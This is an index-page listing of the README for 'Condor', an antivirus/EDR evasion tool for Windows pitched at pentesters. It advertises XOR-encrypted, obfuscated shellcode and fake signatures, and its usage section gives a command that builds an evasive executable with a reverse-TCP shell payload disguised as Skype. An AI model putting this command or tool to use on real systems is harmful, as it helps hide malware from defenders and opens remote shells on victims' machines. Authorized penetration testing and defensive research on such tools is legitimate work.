Data

Tools

Indexes

Applications

Experiments

Awesome

An open API service indexing awesome lists of open source software.

https://github.com/brosck/condor

「🛡️」AVs/EDRs Evasion tool
https://github.com/brosck/condor

antivirus antivirus-evasion av bypass defender edr evasion hacking injection loader protection python security shellcode windows windows-defender xdr

Last synced: 7 months ago
JSON representation

「🛡️」AVs/EDRs Evasion tool

Awesome Lists containing this project

README 

          
「🛡️」About Condor






Condor is a tool created to help pentesters bypass protections like AVs/EDRs/XDRs in the Windows operating system. Condor was developed in Python and has several advantages to help pentesters.



## Executable Scan



![](assets/scan.png)



## Benefits



* Easy to use

* Bypass multiple AVs/EDRs/XDRs

* Two XOR encryption process and an obfuscation

* The generated file is less than 7mb

* Using custom shellcode

* Fake signature on executable



## Environment support



| OS/Subsystem | Installation of All Requirements | Compilation | EXE Execution |

| ----------- | ----------- | ----------- | ----------- |

| Windows | ❌ | ✅ | ✅ |

| Linux | ✅ | ✅ | ❌ |

| Mac | not tested | not tested | not tested |

| WSL | ✅ | ✅ | ✅ |



## Help



![](assets/help.png)

[Reference](https://antiscan.me/scan/new/result?id=ioGKcbzBcSzj)



## Usage



It is recommended to run the tool in a WSL environment, as you will need to generate shellcodes using msfvenom and compile to EXE using pyinstaller.



```

$ git clone https://github.com/Brosck/Condor.git

$ cd Condor

$ chmod +x install.sh

$ sudo ./install.sh

...

$ python3 condor.py -p windows/x64/shell/reverse_tcp -lh  -lp  -i skype

```



It is necessary to have wine installed on the machine to be able to install Python. Install as shown in the screenshot:



![](assets/python-install.png)



## Buy me a coffee?